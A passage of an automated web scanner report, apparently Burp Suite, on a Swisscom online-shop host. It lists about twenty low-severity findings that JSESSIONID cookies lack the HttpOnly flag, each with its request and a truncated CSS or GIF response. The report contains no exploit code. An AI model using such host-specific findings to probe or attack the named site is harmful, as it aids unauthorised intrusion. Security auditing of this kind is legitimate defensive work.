e.drawing_interval = 1 / (e.fps / 1000);
c(this).each(function() {

...[SNIP]...

18.40. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/DropDownList.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/DropDownList.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/DropDownList.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:53:44 GMT
Set-Cookie: JSESSIONID=46CC22997C4F132E47391FC5D7D356D2; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "44b83a274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: text/css
Connection: close
Content-Length: 556

....DropDown_Label {height:20px;float:left;padding-top:2px;margin-right:5px;}
.DropDown_Container{float:left;display:block;overflow:hidden;height:20px;}

.DropDown_Left{float:left;width:8px;height:
...[SNIP]...

18.41. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Images.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Images.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Images.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:09 GMT
Set-Cookie: JSESSIONID=C0A0150C5409AF68B9CE2610FEA7F9DD; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "44b83a274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: text/css
Connection: close
Content-Length: 1215

....bw-icon-small { width:18px;height:18px;margin:1px;/*background: url(images/NavigationBullets.png) no-repeat scroll top left;*/ }
.bw-icon-small { display:inline-block;padding-top:2px;/*margin:-3p
...[SNIP]...

18.42. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ArrowBlackDown.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/ArrowBlackDown.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/ArrowBlackDown.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:08 GMT
Set-Cookie: JSESSIONID=E190732D156F065320F4EE3545BC227B; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "2429ad274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 837

GIF89a........*g..W.................Y?Llv.6Cy..........%cBO.-;s{.....r{................................................................................................................................
...[SNIP]...

18.43. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ArrowBlue.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/ArrowBlue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/ArrowBlue.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:08 GMT
Set-Cookie: JSESSIONID=B5F4C5D6F96C0331A4A1684B79D2667D; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "7064a8274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 153

GIF89a..........%........;..O.......................L..{.....C..v..*.........................................!.......,...........`3Q..,..H.@1..D..P.BR!.;

18.44. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ArrowBlueDown.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/ArrowBlueDown.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/ArrowBlueDown.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:08 GMT
Set-Cookie: JSESSIONID=6680B100ADBC2EB5CDFE290B89FD4373; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "e614b9274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 836

GIF89a..........%........;..O.......................L..{.....C..v..*....................................................................................................................................
...[SNIP]...

18.45. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ArrowRound.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/ArrowRound.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/ArrowRound.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:08 GMT
Set-Cookie: JSESSIONID=C138F481B48CC753B2785418BCED4D6D; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:02 GMT
Accept-Ranges: bytes
ETag: "aa371d284ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 228

GIF89a.............y...........L...........]........~.....T.....%..C.........................................!.......,..........a.'r..u...lfQ..]...S..|5....G.XH.. @.PJ....8...1a.8v.....D
`Tt7X( .Tr.
...[SNIP]...

18.46. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ButtonBackground.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/ButtonBackground.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/ButtonBackground.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:11 GMT
Set-Cookie: JSESSIONID=36319436896A83CB14A59E1DF1A3411F; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "729b0284ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 94

GIF89a.......................................................!.......,...........p...........;

18.47. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ButtonLeft.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/ButtonLeft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/ButtonLeft.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:11 GMT
Set-Cookie: JSESSIONID=D1948E8E99C99F99D7623C488F64C9E3; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "3487c284ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 904

GIF89a    .................................................................................................................................................................................................
...[SNIP]...

18.48. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ButtonRightArrow.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/ButtonRightArrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/ButtonRightArrow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:11 GMT
Set-Cookie: JSESSIONID=23AE76952410A3F570FF0CDC7678FDEF; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "7e8baf274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 236

GIF89a................1.....t........k.......................................................................!.......,..........i.'.di.h..l.RE.b4f.U........+:....1<&...40.Q.X.f.. ...F.)....g.n.5..|..
...[SNIP]...

18.49. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarLeftBottom.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/SeparatorbarLeftBottom.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/SeparatorbarLeftBottom.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:11 GMT
Set-Cookie: JSESSIONID=8C4D433BA5A7E1975633712DFDFD553F; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "3250b4274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 322

GIF89a..2....................................................................................................!.......,......2.....'.#.9.1....,..k,...qAA.......j6.......a3f.LYB....... G..v.d....,.."..N
...[SNIP]...

18.50. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarLeftMiddle.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/SeparatorbarLeftMiddle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/SeparatorbarLeftMiddle.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:11 GMT
Set-Cookie: JSESSIONID=A81EFAF35529A62A3885CCA2AFB3AB07; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "9c1016284ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 66

GIF89a...............................!.......,...........h.;.....;

18.51. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarLeftTop.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/SeparatorbarLeftTop.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/SeparatorbarLeftTop.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:11 GMT
Set-Cookie: JSESSIONID=5F3344FD50C1F8B6136C818A543B210D; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "3487c284ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 352

GIF89a..P....................................................................................................!.......,......P.....'.di.h..l..p,.tm.x..<...*.`.....0D2S.E..Z.8.%..rr,PE.b....3. ...'6...
...[SNIP]...

18.52. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarRightBottom.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/SeparatorbarRightBottom.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/SeparatorbarRightBottom.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:35 GMT
Set-Cookie: JSESSIONID=162A1CE9B2698430AD5746F49D999C98; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:02 GMT
Accept-Ranges: bytes
ETag: "5efc21284ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 337

GIF89a..2....................................................................................................!.......,......2.......D.|h...).......c...Xj<.....H`p.S.....6H.lK..x.Xu...:.[....JV.#..j..
...[SNIP]...

18.53. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarRightMiddle.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/SeparatorbarRightMiddle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/SeparatorbarRightMiddle.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:35 GMT
Set-Cookie: JSESSIONID=99A6878CF63699F629F40B71D4FAB836; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "8ee9e284ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 66

GIF89a...............................!.......,............@%c0...;

18.54. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarRightTop.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/SeparatorbarRightTop.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/SeparatorbarRightTop.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:11 GMT
Set-Cookie: JSESSIONID=E642A74B990FAEDC715BBA8D02C142D5; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "4077bb274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 369

GIF89a..P....................................................................................................!.......,......P.....'.di.h..l..p,.tm.x..;..-.p.@.S....I.M....iB..N..:....D.Uy:U..3..O.q..)
...[SNIP]...

18.55. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/TabLeft.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/TabLeft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/TabLeft.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:11 GMT
Set-Cookie: JSESSIONID=0F7438E86296E912E30D2C2C62CAE9A9; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "e614b9274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 268

GIF89a
......................................................................................................!.......,....
.......'.di.h..,.    .#.\E<.3*C......HTp...0@.G..e......b.@.`.....l Q.cp|<..&a..
...[SNIP]...

18.56. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/TabMiddle.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/TabMiddle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/TabMiddle.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:11 GMT
Set-Cookie: JSESSIONID=1FAAC572723DB0E175AB371DA9C80037; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "f67218284ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 820

GIF89a..................................................................................................................................................................................................
...[SNIP]...

18.57. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/TabRight.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/TabRight.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/TabRight.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:11 GMT
Set-Cookie: JSESSIONID=DA4060AD403022E90BE7FCE30E31CBF4; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "9ad9bd274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 973

GIF89a
.................................................................................................................................................................................................
...[SNIP]...

18.58. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ajax-loader.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Layout/ajax-loader.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Layout/ajax-loader.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=0ED705BF1D35A530C22A2EFE467D36C9; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:01 GMT
Accept-Ranges: bytes
ETag: "d8edb1274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 1787

GIF89a . ............................444...............TTT...!..NETSCAPE2.0.....!.......,.... . ......I)K....JJ5....U.RK....(..&...05+/.mbpz...1...;$.1C....I*    .HCh`A.o..."3qT5.\.8a....B....d..wxG=Y..
...[SNIP]...

18.59. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Watermark.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/App_Themes/Default/Watermark.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/App_Themes/Default/Watermark.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:53:44 GMT
Set-Cookie: JSESSIONID=3F67ED01EF8CA7F57D0A8BB88F0B1A80; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "44b83a274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: text/css
Connection: close
Content-Length: 135

body
{
   background-image: url(/onlineshop/images/watermark.gif);
   background-repeat: no-repeat;
   background-attachment: fixed;
